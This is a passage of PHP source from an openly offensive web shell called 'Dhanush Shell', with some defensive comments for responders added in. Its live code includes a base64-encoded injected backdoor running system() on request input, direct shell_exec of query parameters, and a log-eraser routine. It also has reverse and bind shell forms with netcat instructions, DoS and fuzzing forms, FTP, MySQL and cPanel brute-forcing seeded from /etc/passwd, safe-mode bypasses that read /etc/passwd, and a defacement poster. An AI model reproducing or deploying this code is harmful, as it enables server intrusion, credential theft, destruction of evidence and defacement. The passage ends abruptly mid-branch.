3235 <textarea name="injectthis" cols="110" rows="10" class="box"><?php echo base64_decode("PD9waHAgJGNtZCA9IDw8PEVPRA0KY21kDQpFT0Q7DQoNCmlmKGlzc2V0KCRfUkVRVUVTVFskY21kXSkpIHsNCnN5c3RlbSgkX1JFUVVFU1RbJGNtZF0pOyB9ID8+"); ?></textarea>
3236 </td>
3237 </tr>
3238 <tr>
3239 <td rowspan="2">
3240 <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="button" onClick="codeinjector(pathtomass.value,mode.value,filetype.value,injectthis.value)" class="but" value="Inject "/>
3241 </td>
3242 </tr>
3243 </form>
3244 </table><div id="showinject"</div>
3245 <?php
3246}
3247// Bypass
3248else if(isset($_GET["bypass"]))
3249{
3250 ?><center><div id="showbyp"></div></center>
3251 <table cellpadding="7" align="center" border="3" style="width:70%;border-color:#333333;">
3252 <tr>
3253 <td align="center" colspan="2"><font color="#FF0000" size="3">Safe mode bypass</font></td>
3254 </tr>
3255 <tr>
3256 <td align="center">
3257 <p>Using copy() function</p>
3258 <form onSubmit="bypassfun('copy',copy.value);return false;">
3259 <input type="text" name="copy" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('copy',copy.value)" value="bypass" class="but">
3260 </form>
3261 </td>
3262 <td align="center">
3263 <p>Using imap() function</p>
3264 <form onSubmit="bypassfun('imap',imap.value);return false;">
3265 <input type="text" name="imap" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('imap',imap.value)" value="bypass" class="but">
3266 </form>
3267 </td>
3268 </tr>
3269
3270 <tr>
3271 <td align="center">
3272 <p>Using sql() function</p>
3273 <form onSubmit="bypassfun('sql',sql.value);return false;">
3274 <input type="text" name="sql" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('sql',sql.value)" value="bypass" class="but">
3275 </form>
3276 </td>
3277 <td align="center">
3278 <p>Using Curl() function</p>
3279 <form onSubmit="bypassfun('curl',curl.value);return false;">
3280 <input type="text" name="curl" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('curl',curl.value)" value="bypass" class="but">
3281 </form>
3282 </td>
3283 </tr>
3284
3285 <tr>
3286 <td align="center">
3287 <p>Bypass using include()</p>
3288 <form onSubmit="bypassfun('include',include.value);return false;">
3289 <input type="text" name="include" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('include',include.value)" value="bypass" class="but">
3290 </form>
3291 </td>
3292 <td align="center">
3293 <p>Using id() function</p>
3294 <form onSubmit="bypassfun('id',id.value);return false;">
3295 <input type="text" name="id" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('id',id.value)" value="bypass" class="but">
3296 </form>
3297 </td>
3298 </tr>
3299
3300 <tr>
3301 <td align="center">
3302 <p>Using tempnam() function</p>
3303 <form onSubmit="bypassfun('tempnam',tempname.value);return false;">
3304 <input type="text" name="tempname" value="../../../etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('tempnam',tempname.value)" value="bypass" class="but">
3305 </form>
3306 </td>
3307 <td align="center">
3308 <p>Using symlink() function</p>
3309 <form onSubmit="bypassfun('symlnk',sym.value);return false;">
3310 <input type="text" name="sym" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('symlnk',sym.value)" value="bypass" class="but">
3311 </form>
3312 </td>
3313 </tr>
3314 <tr>
3315 <td colspan=2 align="center">
3316 <p>Using Bypass function</p>
3317 <form onSubmit="bypassfun('newtype',newtype.value,optiontype.value);return false;">
3318 <input type="text" name="newtype" value="/etc/passwd" class="sbox">
3319 <select id="optiontype" class=sbox>
3320 <option value="tac">tac</option>
3321 <option value="more">more</option>
3322 <option value="less">less</option>
3323 <option value="rev">rev</option>
3324 <option value="xxd">xxd</option>
3325 </select>
3326 <input type="button" OnClick="bypassfun('newtype',newtype.value,optiontype.value)" value="bypass" class="but">
3327 </form>
3328 </td>
3329 </tr>
3330 </table>
3331 </form>
3332 <?php
3333}
3334//fuzzer
3335else if(isset($_GET['fuzz']))
3336{
3337 ?>
3338 <form method="GET">
3339 <table id="margins">
3340 <tr>
3341 <td width="400" class="title">
3342 IP
3343 </td>
3344 <td>
3345 <input class="box" name="myip" value="127.0.0.1" onFocus="if(this.value == '127.0.0.1')this.value = '';" onBlur="if(this.value=='')this.value='127.0.0.1';"/>
3346 </td>
3347 </tr>
3348
3349 <tr>
3350 <td class="title">
3351 Port
3352 </td>
3353 <td>
3354 <input class="box" name="port" value="80" onFocus="if(this.value == '80')this.value = '';" onBlur="if(this.value=='')this.value='80';"/>
3355 </td>
3356 </tr>
3357
3358 <tr>
3359 <td class="title">
3360 Timeout
3361 </td>
3362 <td>
3363 <input type="text" class="box" name="time" value="5" onFocus="if(this.value == '5')this.value = '';" onBlur="if(this.value=='')this.value='5';"/>
3364 </td>
3365 </tr>
3366
3367
3368 <tr>
3369 <td class="title">
3370 No of times
3371 </td>
3372 <td>
3373 <input type="text" class="box" name="times" value="100" onFocus="if(this.value == '100')this.value = '';" onBlur="if(this.value=='')this.value='100';" />
3374 </td>
3375 </tr>
3376
3377 <tr>
3378 <td class="title">
3379 Message (The message Should be long and it will be multiplied with the value after it)
3380 </td>
3381 <td>
3382 <input class="box" name="message" value="%S%x--Some Garbage here --%x%S" onFocus="if(this.value == '%S%x--Some Garbage here --%x%S')this.value = '';" onBlur="if(this.value=='')this.value='%S%x--Some Garbage here --%x%S';"/>
3383 </td>
3384 <td>
3385 x
3386 </td>
3387 <td width="20">
3388 <input style="width: 30px;" class="box" name="messageMultiplier" value="10" />
3389 </td>
3390 </tr>
3391
3392 <tr>
3393 <td rowspan="2">
3394 <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="button" onClick="dos('fuzzer',myip.value,port.value,time.value,times.value,message.value,messageMultiplier.value)" class="but" value=" Submit "/>
3395 </td>
3396 </tr>
3397 </table>
3398 </form><div id="showdos"></div>
3399 <?php
3400}
3401// Zone-h Poster
3402 else if(isset($_GET["zone"]))
3403 {
3404 if(!function_exists('curl_version'))
3405 {
3406 echo "<pre style='margin-top:5px'><center><font >PHP CURL NOT EXIST</font></center></pre>";
3407 }
3408 ?>
3409 <center><font size="4" color="#FF0000">Zone-h Poster</font></center>
3410 <form action="<?php echo $self; ?>" method="post">
3411 <table align="center" cellpadding="5" border="0">
3412 <tr>
3413 <td>
3414 <input type="text" name="defacer" value="Attacker" class="box" /></td></tr>
3415 <tr><td>
3416 <select name="hackmode" class="box">
3417 <option >--------SELECT--------</option>
3418 <option value="1">known vulnerability (i.e. unpatched system)</option>
3419 <option value="2" >undisclosed (new) vulnerability</option>
3420 <option value="3" >configuration / admin. mistake</option>
3421 <option value="4" >brute force attack</option>
3422 <option value="5" >social engineering</option>
3423 <option value="6" >Web Server intrusion</option>
3424 <option value="7" >Web Server external module intrusion</option>
3425 <option value="8" >Mail Server intrusion</option>
3426 <option value="9" >FTP Server intrusion</option>
3427 <option value="10" >SSH Server intrusion</option>
3428 <option value="11" >Telnet Server intrusion</option>
3429 <option value="12" >RPC Server intrusion</option>
3430 <option value="13" >Shares misconfiguration</option>
3431 <option value="14" >Other Server intrusion</option>
3432 <option value="15" >SQL Injection</option>
3433 <option value="16" >URL Poisoning</option>
3434 <option value="17" >File Inclusion</option>
3435 <option value="18" >Other Web Application bug</option>
3436 <option value="19" >Remote administrative panel access bruteforcing</option>
3437 <option value="20" >Remote administrative panel access password guessing</option>
3438 <option value="21" >Remote administrative panel access social engineering</option>
3439 <option value="22" >Attack against administrator(password stealing/sniffing)</option>
3440 <option value="23" >Access credentials through Man In the Middle attack</option>
3441 <option value="24" >Remote service password guessing</option>
3442 <option value="25" >Remote service password bruteforce</option>
3443 <option value="26" >Rerouting after attacking the Firewall</option>
3444 <option value="27" >Rerouting after attacking the Router</option>
3445 <option value="28" >DNS attack through social engineering</option>
3446 <option value="29" >DNS attack through cache poisoning</option>
3447 <option value="30" >Not available</option>
3448 </select>
3449 </td></tr>
3450 <tr><td>
3451 <select name="reason" class="box">
3452 <option >--------SELECT--------</option>
3453 <option value="1" >Heh...just for fun!</option>
3454 <option value="2" >Revenge against that website</option>
3455 <option value="3" >Political reasons</option>
3456 <option value="4" >As a challenge</option>
3457 <option value="5" >I just want to be the best defacer</option>
3458 <option value="6" >Patriotism</option>
3459 <option value="7" >Not available</option>
3460 </select></td></tr>
3461 <tr><td>
3462 <textarea name="domain" class="box" cols="47" rows="9">List Of Domains</textarea></td></tr>
3463 <tr><td>
3464 <input type="button" onClick="zoneh(defacer.value,hackmode.value,reason.value,domain.value)" class="but" value="Send Now !" /></td></tr></table>
3465 </form><div id="showzone"></div>
3466 <?php }
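3467// DDos form (?dos): collects target IP, port, timeout, execution time and bytes per packet and hands them to the page's dos('dosser', ...) JavaScript helper; this branch itself only renders the form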
3468 else if(isset($_GET['dos']))
3469 {
3470 ?>
3471 <form method="GET">
3472 <table id="margins">
3473 <tr>
3474 <td width="400" class="title">
3475 IP
3476 </td>
3477 <td>
3478 <input class="box" name="myip" value="127.0.0.1" onFocus="if(this.value == '127.0.0.1')this.value = '';" onBlur="if(this.value=='')this.value='127.0.0.1';"/>
3479 </td>
3480 </tr>
3481
3482 <tr>
3483 <td class="title">
3484 Port
3485 </td>
3486 <td>
3487 <input class="box" name="port" value="80" onFocus="if(this.value == '80')this.value = '';" onBlur="if(this.value=='')this.value='80';"/>
3488 </td>
3489 </tr>
3490
3491 <tr>
3492 <td class="title">
3493 Timeout <font >(Time in seconds)</font>
3494 </td>
3495 <td>
3496 <input type="text" class="box" name="timeout" value="5" onFocus="if(this.value == '5')this.value = '';" onBlur="if(this.value=='')this.value='5';" />
3497 </td>
3498 </tr>
3499 <tr>
3500 <td class="title">
3501 Execution Time <font >(Time in seconds)</font>
3502 </td>
3503 <td>
3504 <input type="text" class="box" name="exTime" value="10" onFocus="if(this.value == '10')this.value = '';" onBlur="if(this.value=='')this.value='10';"/>
3505 </td>
3506 </tr>
3507 <tr>
3508 <td class="title">
3509 No of Bytes per/packet
3510 </td>
3511 <td>
3512 <input type="text" class="box" name="noOfBytes" value="999999" onFocus="if(this.value == '999999')this.value = '';" onBlur="if(this.value=='')this.value='999999';"/>
3513 </td>
3514 </tr>
3515 <tr>
3516 <td rowspan="2">
3517 <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="button" onClick="dos('dosser',myip.value,port.value,timeout.value,exTime.value,noOfBytes.value,'null')" class="but" value=" Attack >> "/>
3518 </td>
3519 </tr>
3520 </table>
3521 </form><div id="showdos"></div>
3522 <?php
3523}
// Mail tools menu (?mailbomb): prints two links that call the page's getdata() JavaScript helper with
// 'bomb' or 'mail'. This branch only emits HTML; the `mailbomb` query key is what shows up in access logs.
3524else if(isset($_GET['mailbomb']))
3525{ ?>
3526 <center><table><tr><td><a href=javascript:void(0) onClick="getdata('bomb')"><font class=txt size="4">| Mail Bomber |</font></a></td>
3527 <td><a href=javascript:void(0) onClick="getdata('mail')"><font class=txt size="4">| Mass Mailer |</font></a></td></tr></table></center><br><div id=showdata></div>
3528<?php
3529}
3530else if(isset($_GET['tools']))
3531 {
3532 ?>
3533 <center><br><form onSubmit="getport(host.value,protocol.value);return false;">
3534 <table cellpadding="5" border="3" style="border-color:#333333; width:50%;">
3535 <tr>
3536 <td colspan="2" align="center"><b><font size='4' color="#FF0000">Port Scanner<br></font></b></td>
3537 </tr>
3538 <tr>
3539 <td align="center">
3540 <input class="sbox" type='text' name='host' value='<?php echo $_SERVER["SERVER_ADDR"]; ?>' >
3541 </td>
3542 <td align="center">
3543 <select class="sbox" name='protocol'>
3544 <option value='tcp'>tcp</option>
3545 <option value='udp'>udp</option>
3546 </select>
3547 </td>
3548 <tr>
3549 <td colspan="2" align="center"><input class="but" type='button' onClick="getport(host.value,protocol.value)" value='Scan Ports'></td>
3550 </tr>
3551 </form>
3552 <tr><td colspan=2><div id="showports"></div>
3553 </td></tr></table>
3554
3555 <br>
3556 <form onSubmit="bruteforce(prototype.value,serverport.value,login.value,dict.value);return false;">
3557 <table cellpadding="5" border="2" style="border-color:#333333; width:50%;">
3558 <tr>
3559 <td colspan="2" align="center"><font size="4">BruteForce</font></td>
3560 </tr>
3561 <tr>
3562 <td>Type : </td>
3563 <td>
3564 <select name="prototype" class="sbox">
3565 <option value="ftp">FTP</option>
3566 <option value="mysql">MYSQL</option>
3567 <option value="postgresql">PostgreSql</option>
3568 </select>
3569 </td>
3570 </tr>
3571 <tr>
3572 <td>Server <b>:</b> Port : </td>
3573 <td><input type="text" name="serverport" value="<?php echo $_SERVER["SERVER_ADDR"]; ?>" class="sbox"></td>
3574 </tr>
3575 <tr>
3576 <td valign="middle">Brute type : </td>
3577 <td><label><input type=radio name=mytype value="1" checked> /etc/passwd</label><label><input type=checkbox id="reverse" name=reverse value=1 checked> reverse (login -> nigol)</label><hr color="#1B1B1B">
3578 <label><input type=radio name=mytype value="2"> Dictionary</label><br>
3579 Login : <input type="text" name="login" value="root" class="sbox"><br>
3580 Dictionary : <input type="text" name="dict" value="<?php echo getcwd() . $directorysperator; ?>passwd.txt" class="sbox">
3581 </td>
3582 </tr>
3583 <tr>
3584 <td colspan="2" align="center"><input type="button" onClick="bruteforce(prototype.value,serverport.value,login.value,dict.value)" value="Attack >>" class="but"></td>
3585 </tr>
3586 </form><tr><td colspan="2" id="showbrute"></td></tr>
3587 </table>
3588 </center><br>
3589 <?php
3590}
// PHP code box (?phpc): renders a textarea (pre-filled with "phpinfo();") whose button passes the text to the
// page's execode() JavaScript helper. Nothing is evaluated in this branch; the handler that receives the
// code is not in this part of the file.
3591else if (isset($_GET["phpc"]))
3592{
3593 ?>
3594 <div id="showresult"></div>
3595 <form name="frm">
3596 <textarea name="code" class="box" cols="120" rows="10">phpinfo();</textarea>
3597 <br /><br />
3598 <input name="submit" value="Execute This COde! " class="but" onClick="execode(code.value)" type="button" />
3599 <label><input type="checkbox" id="intext" name="intext" value="disp"> <font class=txt size="3">Display in Textarea</font></label>
3600 </form>
3601 <?php
3602}
// Exploit lookup (?exploit): without `rootexploit` it renders a site picker; with it, it answers with a
// redirect to a search on the chosen site, built from this host's OS name / kernel release.
// For responders: the Location header discloses the kernel release of the compromised host, so such
// redirects in proxy or web logs indicate someone was researching (presumably privilege-escalation)
// material for this specific machine.
3603else if(isset($_GET["exploit"]))
3604{
3605 if(!isset($_GET["rootexploit"]))
3606 {
3607 ?>
3608 <center>
3609 <form action="<?php echo $self; ?>" method="get" target="_blank">
3610 <input type="hidden" name="exploit">
3611 <table border="1" cellpadding="5" cellspacing="4" style="width:50%;border-color:#333333;">
3612 <tr>
3613 <td style="height:60px;">
3614 <font size="4" class=txt>Select Website</font></td><td>
3615 <p><select id="rootexploit" name="rootexploit" class="box">
3616 <option value="exploit-db">Exploit-db</option>
3617 <option value="packetstormsecurity">Packetstormsecurity</option>
3618 <option value="exploitsearch">Exploitsearch</option>
3619 <option value="shodanhq">Shodanhq</option>
3620 </select></p></td></tr><tr><td colspan="2" align="center" style="height:40px;">
3621 <input type="submit" value="Search" class="but"></td></tr></table>
3622 </form></center><br>
3623
3624 <?php
3625 }
3626 else
3627 {
3628 //exploit search
 // php_uname() is called with unquoted r and s (release and OS name); that relies on PHP treating an
 // undefined constant as its own name.
3629 $Lversion = php_uname(r);
3630 $OSV = php_uname(s);
 // eregi() was removed in PHP 7.0, so this path only runs on PHP 5.x hosts.
3631 if(eregi('Linux',$OSV))
3632 {
 // Only the first six characters of the kernel release go into the search URL.
3633 $Lversion=substr($Lversion,0,6);
3634 if($_GET['rootexploit'] == "exploit-db")
3635 {
3636 header("Location:http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=Linux+Kernel+$Lversion");
3637 }
3638 else if($_GET['rootexploit'] == "packetstormsecurity")
3639 {
3640 header("Location:http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=Linux+Kernel+$Lversion");
3641 }
3642 else if($_GET['rootexploit'] == "exploitsearch")
3643 {
3644 header("Location:http://exploitsearch.com/search.html?cx=000255850439926950150%3A_vswux9nmz0&cof=FORID%3A10&q=Linux+Kernel+$Lversion");
3645 }
3646 else if($_GET['rootexploit'] == "shodanhq")
3647 {
3648 header("Location:http://www.shodanhq.com/exploits?q=Linux+Kernel+$Lversion");
3649 }
3650 }
3651 else
3652 {
 // Non-Linux hosts: the URLs below interpolate only $OSV; the text after "+" is the literal "Lversion".
3653 $Lversion=substr($Lversion,0,3);
3654 if($_GET['rootexploit'] == "exploit-db")
3655 {
3656 header("Location:http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$OSV+Lversion");
3657 }
3658 else if($_GET['rootexploit'] == "packetstormsecurity")
3659 {
3660 header("Location:http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=$OSV+Lversion");
3661 }
3662 else if($_GET['rootexploit'] == "exploitsearch")
3663 {
3664 header("Location:http://exploitsearch.com/search.html?cx=000255850439926950150%3A_vswux9nmz0&cof=FORID%3A10&q=$OSV+Lversion");
3665 }
3666 else if($_GET['rootexploit'] == "shodanhq")
3667 {
3668 header("Location:http://www.shodanhq.com/exploits?q=$OSV+Lversion");
3669 }
3670 }
3671 //End of Exploit search
3672 }
3673}
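3674// Connect (?connect): two forms - "Reverse Shell" posts ip/port/lang with `backconnect`, "Bind Shell" posts port/passwd/lang with `backdoor`; the defaults visible below are port 9891 and bind password "Dhanush", both usable as network and log indicators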
3675else if(isset($_REQUEST['connect']))
3676{
3677 ?>
3678 <form action='<?php echo $self; ?>' method='POST' >
3679 <table style="width:50%" align="center" >
3680 <tr>
3681 <th colspan="1" width="50px">Reverse Shell</th>
3682 <th colspan="1" width="50px">Bind Shell</th>
3683 </tr>
3684 <tr>
3685 <td>
3686 <table style="border-spacing: 6px;">
3687 <tr>
3688 <td>IP </td>
3689 <td>
3690 <input type="text" class="box" style="width: 200px;" name="ip" value="<?php yourip();?>" />
3691 </td>
3692 </tr>
3693 <tr>
3694 <td>Port </td>
3695 <td><input style="width: 200px;" class="box" name="port" size='5' value="9891"/></td>
3696 </tr>
3697 <tr>
3698 <td style="vertical-align:top;">Use:</td>
3699 <td><select style="width: 95px;" name="lang" class="sbox">
3700 <option value="perl">Perl</option>
3701 <option value="python">Python</option>
3702 <option value="php">PHP</option>
3703 </select>
3704 <input type="submit" style="width: 90px;" class="but" value="Connect!" name="backconnect"/></td>
3705 </tr>
3706 </table> </form>
3707 </td>
3708
3709 <td style="vertical-align:top;">
3710 <form method='post' >
3711 <table style="border-spacing: 6px;">
3712 <tr>
3713 <td>Port</td>
3714 <td>
3715 <input style="width: 200px;" class="box" name="port" value="9891" />
3716 </td>
3717 </tr>
3718 <tr>
3719 <td>Password </td>
3720 <td>
3721 <input style="width: 200px;" class="box" name="passwd" value="Dhanush"/>
3722 </td>
3723 <tr>
3724 <td>Using</td>
3725 <td>
3726 <select style="width: 95px;" name="lang" id="lang" class="sbox">
3727 <option value="perl">Perl</option>
3728 <option value="c">C</option>
3729 </select>
3730 <input style="width: 90px;" class="but" type="submit" name="backdoor" value=" Bind "/></td>
3731 </tr>
3732 </table>
3733 </td>
3734 </form>
3735 </tr>
3736 <tr><td colspan=2><font color="#FF0000">Click "Connect" only after open port for it.Use NetCat, run "nc -l -n -v -p 9891"!<br>Click "Bind", use netcat and give it the command 'nc <?php yourip(); ?> 9891"!</font></td></tr>
3737 </table>
3738
3739 <?php
3740 }
3741
// 404-page menu (?404, read from $_REQUEST so GET, POST or cookie can trigger it): prints two links that
// call the page's getdata() JavaScript helper with '404new' or '404page'. This branch only emits HTML.
3742else if(isset($_REQUEST['404']))
3743{
3744 ?>
3745 <center><table><tr><td><a href=javascript:void(0) onClick="getdata('404new')"><font class=txt size="4">| Set Your 404 Page |</font></a></td>
3746 <td><a href=javascript:void(0) onClick="getdata('404page')"><font class=txt size="4">| Set Specified 404 Page |</font></a></td>
3747 </tr></table></center><br>
3748 <div id="showdata"></div>
3749 <?php
3750}
3751else if(isset($_GET['about']))
3752 { ?>
3753 <center>
3754 <p><font size=6><u>D h a n u s h</u></font><br>
3755 <font size=5>[--==Coded By Arjun==--]</font>
3756 <div style='font-family: Courier New; font-size: 10px;'><font class=txt ><pre>
3757
3758 - -- -
3759 -- -- --
3760 -- --
3761 --- ---
3762 ------
3763 ----
3764 ----
3765 ------
3766-------
3767--- --
3768 -- ---
3769 -- -----
3770 --- --- ---
3771 --- --- ---
3772-- --------- --
3773-- ------- --
3774 -- ---- --
3775 -- --- --
3776 -- -- --
3777 --- --- -- ---
3778 ------ ------
3779 ---- ----
3780
3781
3782 </pre></font></div></center>
3783 <font class="txt">Dhanush Shell is a PHP Script, created for checking the vulnerability and security of any web server or website. With this PHP script, the owner can check various vulnerablities present in the web server. This shell provide you almost every facility that the security analyst need for penetration testing. This is a "All In One" php script, so that the user do not need to go anywhere else.<br> This script is coded by an Indian Ethical Hacker.<br> This script is only coded for education purpose or testing on your own server.The developer of the script is not responsible for any damage or misuse of it</font><br><br><center><font size=5>GREETZ To All Indian Hackers</font><br><font size=6>| जय महाकाल | | जय हिन्द |</font></center><br>
3784 <?php }
// Database login form (?database): passes server, username and password to the page's mydatabase()
// JavaScript helper. Defaults are localhost / root / empty password, and the password input is a plain
// text field. This branch only emits HTML.
3785else if(isset($_GET['database']))
3786{ ?>
3787 <form onSubmit="mydatabase(server.value,username.value,password.value);return false;">
3788 <table id="datatable" style="width:90%;" cellpadding="4" align="center">
3789 <tr>
3790 <td colspan="2">Connect To Database</td>
3791 </tr>
3792 <tr>
3793 <td>Server Address :</td>
3794 <td><input type="text" class="box" name="server" value="localhost"></td>
3795 </tr>
3796 <tr>
3797 <td>Username :</td>
3798 <td><input type="text" class="box" name="username" value="root"></td>
3799 </tr>
3800 <tr>
3801 <td>Password:</td>
3802 <td><input type="text" class="box" name="password" value=""></td>
3803 </tr>
3804
3805 <tr>
3806 <td></td>
3807 <td><input type="button" onClick="mydatabase(server.value,username.value,password.value)" value=" Connect " name="executeit" class="but"></td>
3808 </tr>
3809 </table>
3810 </form>
3811 <div id="showsql"></div>
3812<?php
3813}
3814// Cpanel Cracker form (?cpanel): renders a target/usernames/passwords form that posts `cpanelattack`,
// and pre-fills the username box with the local account names of this host.
// For responders: the account list is harvested from /etc/passwd or, failing that, from
// posix_getpwuid(); the fallback leaves a file named test.txt in the shell's working directory.
3815 else if(isset($_REQUEST['cpanel']))
3816 {
 // Both values are assigned here but not referenced again inside this branch.
3817 $cpanel_port="2082";
3818 $connect_timeout=5;
3819 ?>
3820 <center>
3821 <form method=post>
3822 <table style="width:50%;border-color:#333333;" border=1 cellpadding=4>
3823 <tr>
3824 <td align=center colspan=2>Target : <input type=text name="server" value="localhost" class=sbox></td>
3825 </tr>
3826 <tr>
3827 <td align=center>User names</td><td align=center>Password</td>
3828 </tr>
3829 <tr>
3830 <td align=center><textarea name=username rows=25 cols=22 class=box><?php
 // $os is set outside this part of the file.
3831 if($os != "Windows")
3832 {
 // First choice: read /etc/passwd and print the first colon-separated field (the account name) of each line.
3833 if(@file('/etc/passwd'))
3834 {
3835 $users = file('/etc/passwd');
3836 foreach($users as $user)
3837 {
3838 $user = explode(':', $user);
3839 echo $user[0] . "\n";
3840 }
3841 }
3842 else
3843 {
 // Fallback when /etc/passwd is unreadable: ask posix_getpwuid() for uids 0 through 1000 and
 // rebuild passwd-style lines from the answers.
3844 $temp = "";
3845 $val1 = 0;
3846 $val2 = 1000;
3847 for(;$val1 <= $val2;$val1++)
3848 {
3849 $uid = @posix_getpwuid($val1);
3850 if ($uid)
3851 $temp .= join(':',$uid)."\n";
3852 }
3853
3854 $temp = trim($temp);
3855
 // The rebuilt list is written to test.txt (relative path) and read back; nothing in this
 // branch deletes the file afterwards.
3856 if($file5 = fopen("test.txt","w"))
3857 {
3858 fputs($file5,$temp);
3859 fclose($file5);
3860
3861 $file = fopen("test.txt", "r");
3862 while(!feof($file))
3863 {
3864 $s = fgets($file);
3865 $matches = array();
 // Takes the text between the first "/" and the next ":/", strips "home/", and skips
 // values longer than 12 characters, empty values and a fixed list of system directories.
3866 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
3867 $matches = str_replace("home/","",$matches[1]);
3868 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
3869 continue;
3870 echo $matches;
3871 }
3872 fclose($file);
3873 }
3874 }
3875 }
3876
3877 ?></textarea></td><td align=center><textarea name=password rows=25 cols=22 class=box></textarea></td>
3878 </tr>
3879 <tr>
3880 <td align=center colspan=2>Guess options : <label><input name="cracktype" type="radio" value="cpanel" checked> Cpanel(2082)</label><label><input name="cracktype" type="radio" value="ftp"> Ftp(21)</label><label><input name="cracktype" type="radio" value="telnet"> Telnet(23)</label></td>
3881 </tr>
3882 <tr>
3883 <td align=center colspan=2>Timeout delay : <input type="text" name="delay" value=5 class=sbox></td>
3884 </tr>
3885 <tr>
3886 <td align=center colspan=2><input type="submit" name="cpanelattack" value=" Go " class=but></td>
3887 </tr>
3888 </table>
3889 </form>
3890 </center>
3891 <?php
3892}
// Code-injection menu (?malattack): prints two links that call the page's getdata() JavaScript helper with
// 'malware' or 'codeinsert', plus a hidden field holding the `dir` query value, which is echoed into the
// attribute without escaping. The handlers that modify files are not in this part of the file.
3893else if(isset($_REQUEST['malattack']))
3894{
3895 ?><input type="hidden" id="malpath" value="<?php echo $_GET["dir"]; ?>">
3896 <center><table><tr><td><a href=# onClick="getdata('malware')"><font class=txt size="4">| Malware Attack |</font></a></td>
3897 <td><a href=# onClick="getdata('codeinsert')"><font class=txt size="4">| Insert Own Code |</font></a></td></tr></table></center><br>
3898 <div id="showdata"></div>
3899 <?php
3900}
// PHP info page (?com): captures phpinfo() output in a buffer and re-emits only the part between <body>
// and </body>, wrapped in a div. The eval() argument is a fixed string, not request data.
// What this hands to whoever reaches the shell: loaded modules, ini settings, paths and environment
// values of the host.
3901else if(isset($_GET["com"]))
3902{
3903 echo "<br>";
3904 ob_start();
3905 eval("phpinfo();");
3906 $b = ob_get_contents();
3907 ob_end_clean();
 // +6 moves the start offset past the "<body>" tag itself.
3908 $a = strpos($b,"<body>")+6; // yeah baby,, your body is wonderland ;-)
3909 $z = strpos($b,"</body>");
3910 $s_result = "<div class='myphp'>".substr($b,$a,$z-$a)."</div>";
3911 echo $s_result;
3912}
// Command runner (?execute=<command>&executepath=<dir>): changes into the requested directory and passes
// the query-string value straight to shell_exec(); the output is echoed unescaped into a textarea.
// Detection: `execute=` / `executepath=` in web access logs, and the web-server or PHP worker account
// spawning a shell. Hardening: shell_exec can be listed in php.ini disable_functions on sites that do
// not need it.
3913else if(isset($_GET['execute']))
3914{
3915 $comm = $_GET['execute'];
3916 chdir($_GET['executepath']);
3917 $check = shell_exec($comm);
3918
3919 echo "<center><textarea id=showexecute cols=120 rows=20 class=box>" . $check . "</textarea></center>";
3920
3921 ?>
3922 <BR><BR><center><form onSubmit="executemyfn('<?php echo addslashes($_GET['executepath']); ?>',execute.value);return false;">
3923 <input type="text" class="box" name="execute">
3924 <input type="button" onClick="executemyfn('<?php echo addslashes($_GET['executepath']); ?>',execute.value)" value="Execute" class="but"></form></center>
3925 <?php
3926}
// Preset commands (?mycmd=...): the value "logeraser" drops and runs an embedded Perl script; any other
// value is passed unchanged to shell_exec() and its output echoed into a textarea.
// Forensics: look for a file named logseraser.pl (working directory or /tmp), a perl child of the
// web-server process started with the argument "linux", and gaps or truncation in system logs around
// the time of a request carrying mycmd=logeraser.
3927else if(isset($_GET['mycmd']))
3928{
3929 if($_GET['mycmd']=="logeraser")
3930 {
 // The Perl source is stored base64-encoded and deflated inside the shell; in this copy of the page
 // the blob itself has been replaced by a placeholder.
3931 $erase = gzinflate(base64_decode("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"));
3932 if(is_writable("."))
3933 {
 // Writable working directory: write the script there, run it, then delete it.
3934 if($openp = fopen(getcwd()."/logseraser.pl", 'w'))
3935 {
3936 fwrite($openp, $erase);
3937 fclose($openp);
3938 passthru("perl logseraser.pl linux");
3939 unlink("logseraser.pl");
 // Printed whenever the file could be opened; it is not evidence that any log was actually altered.
3940 echo "<center><font color=#FFFFFF size=3>Logs Cleared</font></center>";
3941 }
3942 } else
3943 {
 // Otherwise the script is written to /tmp, but the run and unlink calls below use the relative
 // name, so a copy at /tmp/logseraser.pl can remain on disk when the working directory is not /tmp.
3944 if($openp = fopen("/tmp/logseraser.pl", 'w'))
3945 {
3946 fwrite($openp, $erase)or die("Error");
3947 fclose($openp);
3948 $aidx = passthru("perl logseraser.pl linux");
3949 unlink("logseraser.pl");
3950 echo "<center><font color=#FFFFFF size=3>Logs Cleared</font></center>";
3951 }
3952 }
3953 }
3954 else
3955 {
 // Any other mycmd value is executed as a shell command as-is.
3956 $check = shell_exec($_GET['mycmd']);
3957 echo "<center><textarea cols=120 rows=20 class=box>" . $check . "</textarea></center>";
3958 }
3959}
// Credential guessing (?prototype=ftp|mysql|pgsql): defines a BruteFun() for the chosen service, then
// tries logins against the host:port given in `server` and prints every pair that was accepted.
// type=1 uses the account names from this host's /etc/passwd as both login and password (plus the
// reversed name when `reverse` is set); type=2 tries each line of the file named in `dict` for the
// login given in `login`.
// Detection: a burst of failed FTP/MySQL/PostgreSQL logins whose source address is the web server itself.
// Mitigation: login throttling or lockout on those services, and no account whose password equals or
// mirrors its name.
3960else if(isset($_GET['prototype']))
3961{
